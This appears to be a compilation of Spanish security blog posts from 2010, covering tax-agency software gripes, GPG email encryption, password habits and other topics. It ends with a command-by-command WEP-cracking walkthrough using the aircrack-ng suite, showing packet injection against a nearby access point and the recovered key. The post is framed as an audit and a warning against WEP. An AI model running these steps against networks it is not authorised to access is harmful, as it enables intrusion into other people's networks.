¿Restricciones en mi sistema? ¿No será que se está intentando descargar un fichero en C:\AEAT y no se tienen los privilegios necesarios? A ver, explicación rapidita para los desarrolladores del programa PADRE: desde Windows Vista Internet Explorer se ejecuta con bajos privilegios (low) para precisamente evitar que un usuario simplemente navegando se le pueda instalar un malware en el sistema sin su intervención. Por lo tanto no es posible descargar nada en zonas protegidas y resulta que la raíz de C:, incluyendo todas sus carpetas son zonas protegidas. A esto se les llama Nivele de Integridad.

¿Es tan difícil hacer que se descarguen los datos en el perfil de usuario?, o por lo menos permitir que el usuario seleccione el destino de descarga, porque no se puede ni hacer eso.

Eso sí, la versión de este año te permite cambiar los colores y la apariencia. Seguro que es importantísimo para la declaración de la renta… A cuantos funcionarios desarrolladores habremos tenido que pagar con nuestros impuestos para que se pueda cambiar el colorcito del programa.

Bueno, yo sigo intentándolo, ahora no me voy a dar por vencido. Así que intento un workaround, ingreso directamente a la página Web e intento la descarga manualmente Y me encuentro con esto…

¿Cómo? ¿Solo puedo descargar mis datos fiscales si uso Firefox? ¿Y qué pasa con el resto de los usuarios (incluyendo Opera, Safari, Konkeror, etc.)? Aun así, yo soy muy tozudo y lo intento desde IE 8… pero creo que hoy no es mi día.

Bueno, afortunadamente yo tengo instalado Firefox para estos casos, así que me conecto con Firefox 3.6 y mi sorpresa es mayúscula…. ¡El certificado de la AEAT no es válido para Firefox!, si me lo cuentan no me lo creo. O sea que me obligan a usar Firefox para descargarme mis datos fiscales y ahora no me pueden garantizar la seguridad de la conexión. ¿Cómo voy a confiar en un certificado cuya entidad certificadora no es de confianza en el navegador?. Ahh es que Firefox no utiliza el repositorio central de CAs de confianza de Windows, nooo, ellos van por su lado y les da igual que en el sistema operativo si esté instalada la CA de la FNMT y tampoco tienen interés en cumplir la normativa Europea y aceptar a las Entidades de Certificación Nacionales.

Entonces, no puedo descargarme mis datos fiscales con IE 8 por las restricciones de seguridad, ni tampoco con Firefox por un problema de confianza. Podría añadir una excepción, ya lo sé, pero no debería de ser así. Entre medias de todo esto, he necesitado renovar mi certificado de la FNMT porque este mes se me caducaba y cuando quiero realizar el proceso de renovación, me encuentro con esto…

• Importante: para usuarios de Windows Vista con Internet Explorer 7 o Internet Explorer 8

Vamos a ver, que nos dicen, tal vez el procedimiento cambia en estas versiones de navegador.

A ver si lo entiendo. Me dicen que tengo que desactivar UAC, modificar el nivel de seguridad de sitios de confianza a nivel bajo, quitar la opción de requerir comprobación de servidor https, permitir la descarga y ejecución de controles Active X sin firmar y que se ejecuten todos los controles Active X sin preguntar, etc. ¿Que mas queda?, ¿qué me tire por un puente?

Es increíble que una entidad de gobierno que se supone que vela por la seguridad de las comunicaciones en España, recomiende deshabilitar cualquier tipo de seguridad que viene por defecto en IE 7 e IE 8 para poder descargarse un certificado de “seguridad”. Esto es España señores, qué más da. Aquí vale todo.

Ya no se ni cuánto tiempo llevo con esto, creo que hacer la declaración de la renta debería de ser un proceso sencillo, aplicable a todas las plataformas y navegadores y sobre todo pensado para usuarios que no son informáticos.

Entonces que me queda. Creo que este año seguiré utilizando el obsoleto e inseguro Windows XP para hacer mi declaración y para renovar los certificados de la FNMT. Esperemos que el próximo año la AEAT y la FNMT se den cuenta de que la seguridad va en otro sentido, que han perdido el tren y sobre todo que contraten a gente competente y que sepa hacer las cosas bien.

http://elladodelmal.blogspot.com

Agencia Tributaria + Linux

2010-04-28T15:48:00.001+02:00

Buenos días a todos y todas.

Despues de años y años de espera, por fin podemos rellenar nuestra Declaración de la Renta (los que quieran hacerlo, jeje) utilizando Linux.

Es un fichero llamado: renta2009_unix_1_00.sh, que lo podemos descargar desde aquí (página de la Agencia Tributaria)

Una vez descargado, desde una consola le damos permisos de ejecucion:

chmod +x renta2009_unix_1_00.sh

y lo iniciamos:

./renta2009_unix_1_00.sh

Si preferimos hacerlo de modo gráfico, nos vamos al directorio donde hemos descargado el archivo, pinchamos en él con el botón derecho del ratón, picamos en Propiedades y en la pestaña de Permisos marcamos la opción de Permitir ejecutar el archivo como un programa, y ya lo tenemos preparado para que al hacer doble clic sobre él se ejecute el instalador.

Pues ale, eso es todo de momento.

Un saludo.

Ubuntu Linux supera la barrera de los 12 millones de usuarios

2010-04-28T09:48:00.001+02:00

Con solo algunos días para la llegada al mercado de su nueva versión Ubuntu 10.04, representantes de Ubuntu Linux intentaron mostrar la aceptación que esta teniendo su sistema operativo al indicar que han superado la barrera de los 12 millones de usuarios.

Antes de hablar de esta gran cifra, tenemos que recordar que el nuevo Ubuntu, conocido en la industria como Lucid Lynx, estará disponible desde los últimos días del mes, presentando nuevas herramientas y un nuevo diseño.

Estas mejoras son muy importantes porque se cree que el nuevo Lucid permitirá llevar el sistema operativo Ubuntu a las masas, a pesar de que el uso de este sistema ha crecido casi un 50% en menos de dos años.

Esto se debe a que Canonical, el mayor apoyo de Ubuntu indicó que bajo sus últimos estimados, el Ubuntu es utilizado por más de 12 millones de personas en todo el mundo, aunque es muy difícil ofrecer números concretos por la falta de proceso de registro.

A pesar del crecimiento, tenemos que decir que el Ubuntu todavía no lidera el mercado Linux, algo confirmado al descubrir que el Fedora Linux de Red Hat ha superado los 24 millones de instalaciones.

Dejando de lado los números, la llegada del Lucid es muy importante para Linux ya que es el primer lanzamiento de un sistema LTS (Long-Term Supported) en dos años, lo que significa que será soportado por Ubuntu Desktop por tres años y por Ubuntu Server por cinco.

Para tener una idea de la importancia de esta versión, los lanzamientos generales llegan al mercado cada seis meses y solo presentan 18 meses de respaldo.

El ultimo lanzamiento de un Ubuntu LTS fue en abril del 2008.

Compra cerraduras para tu casa

2010-04-16T10:02:00.002+02:00

El Lockpicking “el arte de abrir una cerradura sin necesidad de tener la llave original”. Es un mundo relacionado con la seguridad informática a través de la seguridad física de las cerraduras. De hecho en varios concursos de hacking, como en la DEFCON, una de las primeras fases consiste en realizar Lockpicking sobre la cerradura de una puerta que lleva al servidor que tienen que defender.

Una de las técnicas más sencillas para abrir una cerradura es la conocida como Bumping, en este video unos expertos muestran lo fácil que es abrir una cerradura mediante este método. Como explican, consiste en introducir una llave estándar en una cerradura y dar un golpe contundente mientras se intenta girar la misma. Se puede encontrar un video, de la Defcon 3, explicando por qué funciona la técnica aquí.

Y es que parece que el mundo de la seguridad física está peor que el de la seguridad informática, ¿no creéis?

Fuente: Informatica64

Seguridad en Facebook

2010-04-15T12:47:00.001+02:00

La primera pregunta que hay en la página oficial de Facebook es?

¿Cómo puedo aumentar la seguridad en Facebook?

En primer lugar, no des a nadie tu contraseña, ni siquiera a tu pareja...

En primer lugar, no des a nadie tu contraseña, ni siquiera a tu pareja ni a tu mejor amigo. No olvides personalizar las opciones de la página "Configuración de privacidad" si no quieres aparecer en las búsquedas ni que vean tu perfil miembros de la red de tu lugar de estudio o trabajo. Recuerda no publicar nada en tu perfil que no quieras incluir en un currículum o una solicitud de beca.

Curioso nó???

Cifra tu correo

2010-04-07T16:43:00.000+02:00

Cuando hacemos una transferencia bajo https o utilizamos la firma digital en la Red, transmitimos de manera segura y oculta mensajes que no queremos que caigan en manos de personas distintas a sus destinatarios

NIVEL: INTERMEDIO

Por mucho que nos preocupe el tema de la seguridad, la realidad es que de un día para otro no podemos empezar a enviar todos nuestros e-mails cifrados porque la mayoría de los destinatarios no sabrían ni qué hacer con ellos. En muchos casos, enviar nuestros adjuntos en ZIPs protegidos con contraseña puede ser más que suficiente. No obstante, este práctico está pensado para aquellos que quieran mandar un correo con un adjunto de una manera extremadamente segura. ¿Cómo de segura? En teoría, el objetivo es convertir el contenido de nuestro mensaje en un ciphertext que no pueda ser roto con la tecnología actual, aunque quizás en veinte años los ordenadores serán capaces de merendarse cifrados como estos en fracciones de segundo.

Paso 1. Instala GPG 4win

Gpg4win es un paquete de programas para entornos Windows que incluye como componentes principales GnuPG, la aplicación encargada del cifrado, y Kleopatra, un gestor de certificados X.509 y OpenPGP. Este último es el único componente con el que tenemos que interactuar para conseguir nuestro objetivo. Si trabajamos con Mac o Linux, accederemos a otras soluciones desde GnuPG.

El proceso de instalación es sencillo. Descargamos el ejecutable desde el apartado Downloads y mantenemos las opciones de instalación por defecto. La configuración original no incluye la instalación de Claws Mail, el gestor de correo incluido dentro GPG 4win, ya que pretendemos cifrar nuestro e-mail alterando lo menos posible el proceso que seguimos para gestionar nuestro correo habitualmente; es decir, podéis seguir este práctico independientemente de que uséis cualquier programa del mercado. De hecho, el resultado lo podríamos enviar a través de Skype o Messenger, o guardarlo en un CD o pendrive y mandarlo por correo postal, y seguiría siendo totalmente seguro.

Paso 2. Certificado personal

GnuPG, también conocido como GPG, es un alternativa gratuita a PGP, los dos cifran sus mensajes con claves asimétricas. Podría decirse que es como si alguien nos diera una caja de candados abiertos, pero que conservara en su poder la llave que permite abrirlos todos. De esta manera, cualquier persona que haya recibido un candado podrá meter un documento secreto en una caja y cerrarla, aunque solo el portador de la llave podría abrirlo. Este sistema es un avance con respecto a los de clave simétrica, en los que los dos usuarios deben de disponer de la clave (llave), que es la misma para encriptar como para desencriptar.

En los sistemas asimétricos, distribuir «candados» por vías inseguras como Internet no entraña ninguna brecha de seguridad porque, a partir del candado, es prácticamente imposible descubrir la llave. Aproximándonos más a la terminología correcta, en GnuPG, el candado es nuestra clave pública, y ahora vamos a ver cómo nos creamos una.

Lo primero es ejecutar Kleopatra, que es el único programa con el que vamos a interactuar. En el apartado File, elegiremos la opción New Certificate e iniciaremos el asistente para crear un certificado personal OpenPGP. Será necesario rellenar nuestro nombre y la dirección en la que esperamos recibir los e-mails que se envíen cifrados con este certificado, así como una contraseña buena como para que el asistente la califique como de 100% de calidad. Una vez concluido el proceso, finalizaremos el asistente y veremos que el certificado se ha incorporado a la pestaña My Certificates de Kleopatra.

Paso 3. Envío de claves

Para enviar nuestra clave pública desde la pestaña My Certificates, seleccionaremos el certificado que acabamos de crear y elegiremos en el menú contextual la opción Export certificates, lo que genera un fichero con un bloque enorme de texto en su interior. Lo más sencillo será adjuntar el archivo, aunque también podremos copiar el contenido dentro del propio mensaje. Por su parte, con nuestro destinatario sucederá de hecho algo similar, esto es, habrá recibido por e-mail o a través de cualquier otro medio un fichero similar al nuestro. Guardaremos ese archivo en nuestro disco duro y, utilizando Kleopatra, lo importaremos (File/Import Certificates), pasando a incorporarse a la pestaña Imported Cetificates.

Paso 4. Cifra el adjunto

Vamos a imaginar que en nuestro e-mail secreto queremos enviar un PDF que contiene un plan para dominar el mundo. Para encriptarlo, pulsaremos desde Kleopatra en el icono del candado Sign/Encrypt Files y seleccionaremos el archivo que queremos proteger. En el asistente elegiremos la opción Encrypt , lo que nos conducirá a una pantalla donde elegiremos el certificado con el que queremos realizar la operación. Lo añadiremos pulsando sobre Add. El asistente nos recomienda que añadamos uno de nuestros certificados, además del de nuestro destinatario o no descifraremos nuestro propio adjunto. El resultado es un fichero con un nombre similar al original, pero con extensión GPG.

Paso 5. Encripta el texto

No estaríamos siendo del todo profesionales si el texto de nuestro mensaje viajara sin cifrar, así que, cuando lo tengamos terminado, lo copiaremos en el Portapapeles. A continuación, haremos clic con el botón derecho del ratón en la Bandeja de sistema, sobre el icono de Kleopatra y elegiremos la opción Clipboard/Encrypt. Aparecerá un asistente en el que tendremos que seleccionar el certificado del destinatario del correo. Continuaremos con el proceso y recibiremos un mensaje de éxito. El resultado de cifrar el texto que copiamos nos es devuelto a través del propio Portapales, por lo que solo tendremos que volver a nuestro e-mail y pegar el mensaje cifrado encima de nuestro mensaje original. El texto cifrado debe ser el único contenido de nuestro correo, y tendremos en cuenta que el Asunto es la única parte que no queda protegida.

Paso 6. Descifra el correo

Una vez que ya tenemos todo el contenido de nuestro e-mail cifrado, podremos enviarlo por correo con la tranquilidad de que, aunque sea interceptado, es prácticamente imposible descifrarlo sin la llave correspondiente. Cuando el destinatario reciba el mensaje, tendrá que realizar exactamente las mismas operaciones que hemos hecho nosotros, pero en sentido contrario. Lo primero será copiar el texto cifrado que contiene el e-mail en el Portapapeles incluyendo la cabecera (-----BEGIN PGP MESSAGE-----) y el pie (-----END PGP MESSAGE-----), hacer clic con el botón derecho del ratón sobre el icono de Kleopatra en la Bandeja de sistema y elegir la opción Clipboard y después Decrypt/Verify, introduciendo su clave secreta para que se pueda completar el proceso. El resultado descifrado quedará volcado de nuevo en su Portapapeles, desde donde lo podrá pegar en cualquier editor de texto para poder leerlo cómodamente.

A continuación, tendrá que descifrar el adjunto. Para ello, lo guardará en su disco duro y después lo arrastrará a la ventana de Kleopatra o hará clic sobre el icono Decrypt/Verify Files, indicando a la aplicación dónde se encuentra el archivo cifrado. Posteriormente, pulsará sobre Decrypt/Verify y recibirá un mensaje de proceso finalizado con éxito, quedando el fichero resultante depositado en el mismo lugar desde donde se recogió la versión cifrada.

Toda esta seguridad está basada en que se ha recibido la auténtica llave pública. Si alguien ha sido capaz de suplantarle y facilitarte su propia llave pública, estaríamos ante lo que en criptografía se denomina un ataque man-in-the-middle (MitM). Más allá de este escenario de película de espía, ¿cómo sabe tu destinatario que eres tú quien envía el mensaje y no otra persona? Firmándolo, tanto GnuPG como GPG ofrecen al remitente la posibilidad de firmar sus mensajes. La firma se realiza con la clave secreta y puede ser verificada con clave pública (es posible firmar un documento aunque no lo cifres si bien lo más normal es combinar ambos procesos). Al proceso de comprobar una firma se le llama Verificar.

Dependiendo de nuestro gestor de correo, podremos encontrar distintos plug-ins y aplicaciones que se integrarán con él para que todas las tareas explicadas sean más transparentes, pero lo bueno del procedimiento descrito es que es completamente independiente del gestor de correo, lo que lo convierte en una solución ideal para cifrados esporádicos.

Un hacker consigue piratear el iPad en menos de 24 horas después de ponerse en venta en EE.UU.

2010-04-07T09:29:00.001+02:00

La noticia se ha conocido mediante un mensaje en Twitter y un vídeo en Youtube en los que los autores muestran cómo han logrado piratear el nuevo dispositivo de la compañía de la manzana.

Un vídeo en Youtube y un tweet en la red de microblogging Twitter son las pruebas de que un hacker ha logrado piratear mediante una técnica conocida como jailbreak el iPad de Apple en menos de 24 horas después de que el dispositivo comenzase a venderse en Estados Unidos.

El jailbreak consiste en lograr acceder a todos los archivos y carpetas del iPad para poder, entre otras cosas, instalar aplicaciones de terceros no autorizadas por Apple y modificar las que ya están instaladas.

La noticia se ha conocido mediante un mensaje en Twitter y un vídeo en Youtube en el que los autores muestran cómo han logrado piratear el nuevo dispositivo de la compañía de la manzana. El hacker es miembro del equipo Dev-Team, conocido por haber hecho lo mismo con el iPhone.

El vídeo lo tenéis aquí....

Malos habitos de Contraseñas

2010-02-15T09:20:00.003+01:00

(Posted by Julio Jaime)

Leo en The Register una nota sobre un estudio realizado a un base de datos de contraseñas ( 32 millones )que fueron expuestas en un ataque al sitio RockYou. Las passwords almacenadas en plaintext, revelaron que las mayores frecuencias estaban dadas por :

1. 123456
2. 12345
3. 123456789
4. Password
5. iloveyou
6. princess
7. rockyou
8. 1234567
9. 12345678
10. abc123

El estudio revelo que el 50% ( 16 millones !!! ) de las passwords, utilizaban nombres, slangs ( una especie de lunfardo ), palabras del diccionario y series consecutivas de letras y numeros.

Mas alla de la seguridad de las passwords, una vez mas vemos como también es peligroso utilizar la misma contraseñas en diferentes sitios. Quien tenia la misma contraseña en el sitio RockYou que en su cuenta de Gmail/Hotmail/Yahoo, quedo expuesto a problemas catastróficos, si además utilizaba estas cuentas para recuperar las passwords de otros sitios.

El sitio CXO realizo un excelente grafico utilizando la herramienta de Gmail que mide que tan "segura" es la password ingresada.

Recuerdan este post ? Me tome el trabajo de hacer lo mismo con la herramienta de Microsoft.

Sorprendente no ?

Gmail otorga una falsa sensación de seguridad o Microsoft es demasiado rígido ?

En los ejmplos, Google crea una falsa sensacion de seguridad, al menos con passwords como "enzoferrari" al declararla como "buena".
Por otro lado debo decir que el validador de Google otorga a "enzoferrar" un valor de "strong" y le quita fortaleza al encontrar el nombre completo....

En la pagina de pruebas de passwords MS recomienda :

A strong password should appear to be a random row of characters. It should be at least 14 characters long. It should include a combination of uppercase and lowercase letters, numbers, punctuation, and symbols.

Por otro lado los tips de seguridad de Google :

Tips for creating a secure password:

Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.

Things to avoid:

Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).

La mayor diferencia esta en el largo de las passwords.

Resulta interesante notar que para Microsoft la password :

abcd1234 tiene una seguridad MEDIUM

Lo cual para Google resulta en WEAK.

En cambio, en la empresa de Redmond

dethknight55 resulta en una password WEAK

y para Google la password es STRONG

Yo les voy a dar mi tip de seguridad para las passwords :

En donde el sistema lo soporte utilicen frases, tomen la letra de una canción como password.

Por ejemplo :

Quieroqueteduermascomounsolqueseacuestaenuncampodetrig0

(Cancion de cuna. Los Piojos )

Quiero algo mas complicado ?

WerwartetmitbesonnenheitderwirdbelohntzurrechtenzeiT

o en castellano :

Quienesperapacientementeserarecompensad0

( Rammlied. Rammstein )

O pueden optar por golpearse con un martillo los dedos, mientras dicen un par de palabras, asi queda encriptada.

Elagfhsdlaptamdssdfdssdazul

Nuevo vídeo de la OSI para concienciar sobre la privacidad en redes sociales

2010-02-01T22:23:00.000+01:00

Se ha publicado el tercer vídeo divulgativo y promocional de la Oficina de Seguridad del Internauta . En esta ocasión se trata de concienciar a los usuarios sobre la importancia de configurar de manera adecuada las opciones de seguridad en las redes sociales.

Actualmente las redes sociales son uno de los fenómenos más populares en la Red. Resultan indiscutibles sus diversas aplicaciones: programar citas entre los miembros de un grupo, recordar cumpleaños, etc. Aunque sin duda, la principal es compartir información. Es en este aspecto donde en muchas ocasiones, se desconoce lo “transparente” que se puede ser en Internet. Es posible que tus compañeros de trabajo conozcan lo que pasa por tu cabeza o que tu jefe sepa lo que opinas de él. Por esta razón se debe poner especial cuidado en la configuración de las opciones de privacidad de la red social.

Vídeo divulgativo de la OSI sobre la privacidad en redes sociales.

Transcripción textual del vídeo:

[Una cámara va recorriendo la planta de una oficina y se va parando en cada empleado. Los dos primeros están en su escritorio. Sobre la cabeza del primero se lee "Parece que estoy trabajando pero en realidad estoy viendo vídeos del Youtube", sobre la de el segundo "Robo papel higiénico". La cámara sigue hasta la máquina de hacer fotocopias donde se encuentra una chica. Sobre su cabeza se lee "No soporto a mi jefe"]

[Fundido en negro y aparecen los mensajes: 1º "Usar incorrectamente una red social, es regalar tu vida a millones de personas"; 2º "¿Usas las opciones de privacidad de tu red social?"]

[Fundido en blanco y aparecen el mensaje: "Haz de tu ordenador un lugar seguro". A continuación aparece la dirección de la Oficina de seguridad del internauta (http://www.osi.es) y el teléfono (901 11 121)]

El objetivo principal de estos vídeos, es llegar al mayor número de usuarios y tratar de concienciar sobre la importancia de la seguridad en las Tecnologías de la Información. Adicionalmente, se les invita a visitar el portal de la OSI donde se ofrecen herramientas e información para hacer frente a las diferentes amenazas existentes en Internet.

Auditoría Wireless con Wisacom WS-HP 800

2010-01-25T09:44:00.001+01:00

Aprovechando que hace poco recibí un regalito de reyes, he decidido realizar una prueba de concepto para hacer una auditoría de red inalámbrica. El tipo de seguridad escogida ha sido WEP, que aunque ya no esté de moda porque casi todos sabemos romperla, sigue sorprendiendo lo fácil que es. Espero que este artículo sirva además de para conocer la simplicidad de uno de los procedimientos de ruptura de claves WEP, para aconsejar a aquellos inconscientes que todavía sigan utilizando este tipo de "seguridad" que dejen de hacerlo desde hoy.

El adaptador utilizado para la auditoría es un Wisacom WS-HP 800 y el chipset incorporado es RTL8187L. Nuestro sistema operativo es Ubuntu 9.10 y las claves a romper son de tipo WEP.

En la siguiente imagen podemos ver la imagen del adaptador Wi-Fi USB que utilizo:

Antes de comenzar con la auditoría debemos hacer unas comprobaciones:

Comprobaciones previas

Controlador del adaptador Wi-Fi

Primero de todo tenemos que comprobar si el adaptador es reconocida por nuestro sistema. Al ser de tipo USB lo comprobamos así:

marc@ubuntu:~$ lsusb grep Realtek
Bus 002 Device 007: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

En mi caso, no he tenido problemas, me la reconoce, si esto no fuera así tendríamos que buscar drivers o utilizar ndiswrapper

Listado de Interfaces

Normalmente siempre tenemos 2 interfaces de red,

lo: Interfaz de loopback
eth0: Interfaz de de red LAN

Para ver una lista de las interfaces que soportan escaneo de redes Wireless lo hacemos así:

marc@ubuntu:~$ iwlist scan
lo Interface doesn’t support scanning.

eth0 Interface doesn’t support scanning.

wmaster0 Interface doesn’t support scanning.

wlan0 Scan completed :
Cell 01 – Address: 00:19:15:AA:0C:E2
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=40/70 Signal level=-70 dBm
Encryption key:on
ESSID:”MI RED”
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
Mode:Master
Extra:tsf=00000041824689e9
Extra: Last beacon: 3597628ms ago
IE: Unknown: 000554656C6532
IE: Unknown: 010882848B962430486C
IE: Unknown: 03010B
IE: Unknown: 2A0104
IE: Unknown: 2F0104
IE: Unknown: 32040C121860
IE: Unknown: DD090010180200F4000000
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK

pan0 Interface doesn’t support scanning.

wmaster1 Interface doesn’t support scanning.

wlan1 Failed to read scan data : Network is down

Como veis, tengo más de una interfaz de red:

lo: Interfaz de loopback
eth0: Interfaz de de red LAN
wlan0:Otra Interfaz Wireless que lleva mi equip integrada, pero que no soporta inyección
pan0: Interfaz de la conexión Bluetooth
wlan1: Interfaz del Wisacom WS HP-800

Ahora que ya tenemos la lista de las interfaces, podemos observar en ella que la interfaz wlan1 no está activa. Debemos activarla mediante el comando:

marc@ubuntu:~$ sudo ifconfig wlan1 up

Ahora que ya tenemos la interfaz reconocida y levantada podemos comenzar con la auditoría.

Auditando Wireless

Entrando en modo Monitor

Antes de nada hemos de activar el modo monitor, que sirve para poder capturar todos los paquetes que circulan por la red, en este caso por el aire.

Para activar el modo monitor hacemos:

marc@ubuntu:~$ sudo airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
1010 avahi-daemon
1011 avahi-daemon
2072 wpa_supplicant
Process with PID 2072 (wpa_supplicant) is running on interface wlan0

Interface Chipset Driver

wlan0 Ralink 2561 PCI rt61pci – [phy0]
wlan1 RTL8187 rtl8187 – [phy2]
(monitor mode enabled on mon0)
mon1 RTL8187 rtl8187 – [phy2]

Ahora ya tenemos el modo monitor activado y como podéis comprobar nos ha creado otra interfaz llamada mon0 (En el caso de este adaptador).

Búsqueda del objetivo a auditar

Podemos comenzar a capturar paquetes y a enumerar las redes cercanas y sus clientes, para lo que utilizaremos este comando:

airodump-ng start mon0

En mi caso es mon0, pero si al ejecutar el comando airmon-ng obtuviéramos otro nombre, pues sería el que deberemos utilizar.

CH 10 ][ Elapsed: 2 mins ][ 2009-12-23 18:02

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:15:AA:0C:E2 -50 328 1536 0 11 54 WPA TKIP PSK RED1
00:21:63:EF:C5:D0 -57 269 0 0 11 54e WPA TKIP PSK RED2
00:22:2D:44:E3:E1 -66 251 30 0 3 54e. WEP WEP RED3
00:1A:2B:4A:5E:79 -74 45 0 0 11 54 WEP WEP RED4
00:03:6F:49:11:04 -74 2 0 0 11 54 WPA TKIP PSK RED5
00:1A:2B:08:27:65 -1 0 0 0 158 -1
00:1B:11:23:C2:9E -73 12 0 0 6 54 . WEP WEP RED6
00:22:15:00:21:FD -77 1 0 0 1 54 WEP WEP RED7
00:22:93:C0:C0:E0 -73 8 0 0 1 54 WPA TKIP PSK RED8

BSSID STATION PWR Rate Lost Packets Probes

00:19:15:AA:0C:E2 00:1C:BF:B5:51:90 -33 54 -48 0 1633 linksys,CLINEAP,Belkin_G_Plus_MIMO_ADSL,FP_STN_N,FP_STN_A,F2_TOP_F
00:19:15:AA:0C:E2 00:1A:70:B1:77:97 -22 24 -36 0 5
00:22:15:00:21:FD 00:22:43:2C:DE:B1 -74 0 - 1 0 9 RED9

Aquí veis las redes inalámbricas que me aparecen. Solo nos interesan las del tipo WEP.

Una vez hemos encontrada la red que red queremos auditar, paramos el comando anterior con las teclas control +z y escribiremos otro comando:

marc@ubuntu:~$ sudo airodump-ng --channel 3 --bssid 00:22:2D:44:E3:E1 --write REDESCOGIDA mon0

Cuando ejecutas airodump-ng guardas los paquetes de datos (DATA), que son los que utilizaremos para crackear la contraseña de la red. Para que no se cree un fichero demasiado grande sólo guardaremos los datos de la red que nos interesa. SI os fijáis no recogemos muchos paquetes tipo Data y eso es, porque no nos hemos asociado al router.

Autenticación contra el AP

Para conseguir mas datos tendremos que hacer creer al router que somos un cliente mas. Esto se hace mediante el siguiente comando:

marc@ubuntu:~/Escritorio$ sudo aireplay-ng -1 30 -o 1 -e REDESCOGIDA -a 00:22:2D:44:E3:E1 -h 00:1A:EF:77:88:65 mon0

Con este comando nos haremos pasar por un cliente. El parámetro -a es la MAC de la Víctima y el -h la mac de nuestra tarjeta, el -e es el nombre de la red. Cuando ejecutemos el comando nos debería salir algo así.

17:08:35 Waiting for beacon frame (BSSID: 00:22:2D:44:E3:E1) on channel 3

17:08:35 Sending Authentication Request (Open System) [ACK]
17:08:35 Authentication successful
17:08:35 Sending Association Request [ACK]
17:08:35 Association successful (AID: 1)

De modo que ya estamos autenticados y asociados como cliente.

Ahora tenemos un problema; aunque estemos asociados como cliente (falso cliente), si no se genera gran cantidad de tráfico no podremos conseguir mas paquetes de datos para poder crakear la contraseña. Así que, si no hay mucho tráfico lo trataremos de generar nosotros.

Inyectando Paquetes

La inyección de tráfico de red, solo tiene sentido, si nuestra acción lleva asociada una reacción. Se trata de elegir algún tipo de paquete que obligue al punto de acceso o a cualquiera de los equipos conectados a él a responder con otros paquetes nuevos cifrados de forma correcta. Para ello, lo más habitual es elegir un paquete de tipo ARP, ya que conocemos su estructura y obliga (si está bien construido) al punto de acceso a responder su solicitud. Por cada paquete enviado, al menos recibiremos uno nuevo contestado, por lo que al enviar masivamente miles de paquetes, se responderá con otros miles más y obtendremos tráfico suficiente para la obtención de la clave.

Para obtener un paquete correcto y posteriormente reinyectarlo miles de veces lo haremos así:

root@ubuntu:/home/marc# aireplay-ng -3 -b 00:22:2D:44:E3:E1 -h 00:1A:EF:77:88:65 mon0

Mediante este comando inyectamos paquetes en la red para que suban los data. Si hemos anteriormente conseguido autenticarnos de manera exitosa al punto de acceso como cliente, podremos ver como los paquetes data suben rápidamente.

17:06:38 Waiting for beacon frame (BSSID: 00:22:2D:44:E3:E1) on channel 3
Saving ARP requests in replay_arp-1223-170638.cap
You should also start airodump-ng to capture replies.
Read 2229 packets (got 87 ARP requests and 107 ACKs), sent 102 packets…(499 ppRead 2368 packets (got 127 ARP requests and 155 ACKs), sent 152 packets…(499 pRead 2513 packets (got 172 ARP requests and 204 ACKs), sent 202 packets…(499 pRead 2653 packets (got 214 ARP requests and 252 ACKs), sent 253 packets…(501 pRead 2800 packets (got 260 ARP requests and 303 ACKs), sent 302 packets…(499 pRead 2938 packets (got 309 ARP requests and 350 ACKs), sent 352 packets…(499 pRead 3081 packets (got 359 ARP requests and 402 ACKs), sent 402 packets…(499 p
Read 426419 packets (got 265265 ARP requests and 147624 ACKs), sent 148347 packets…(500 pps)

Ya podemos decir prácticamente que el trabajo está hecho... Cuando hayamos conseguido mas o menos 15000 data podremos ejecutar el comando aircrack-ng (éste se ejecutará múltiples veces hasta que el número de paquetes sea suficiente para romper la clave):

root@ubuntu:/home/marc# aircrack-ng REDESCOGIDA.cap

El comando procesa así:

Aircrack-ng 1.0

[00:00:00] Tested 813 keys (got 126018 IVs)

KB depth byte(vote)
0 1/ 2 37(140032) 90(139264) B8(139264) 12(137216) AD(136448) 16(136192) A1(135936) 52(135680) 7C(135680) 7B(135424) DE(135424) F1(135424)
1 6/ 1 EA(136960) 9F(136192) E9(136192) 00(135936) B1(135936) B6(135680) E8(135424) 42(134912) B3(134400) 9D(134144) 04(133888) 0A(133632)
2 3/ 13 CF(139520) A9(138240) 2D(137984) 93(137984) A4(136960) 85(136704) E1(136704) 6F(136192) 01(135680) 16(135680) 0D(134912) B4(134912)
3 0/ 1 F4(174336) 29(139520) 06(138752) 48(138752) BD(138496) 5B(137984) E0(137728) 80(136960) 5E(136704) C6(136192) 3A(135680) 20(135168)
4 17/ 4 14(134144) E9(133888) 00(133376) 0C(133376) A8(133376) EB(133376) 99(133120) 17(132608) 5B(132608) A7(132608) F6(132608) 29(132352)

KEY FOUND! [ 33:43:39:45:34:35:34:38:46:42:42:36:32 ] (ASCII: 3C9E4548FBB62 )
Decrypted correctly: 100%

Y YA TENEMOS EL PASSWORD, jeje.

Como habeis podido ver, mediante una simple serie de comandos se puede conocer rápidamente el password de una red de tipo WEP. El próximo paso, WPA.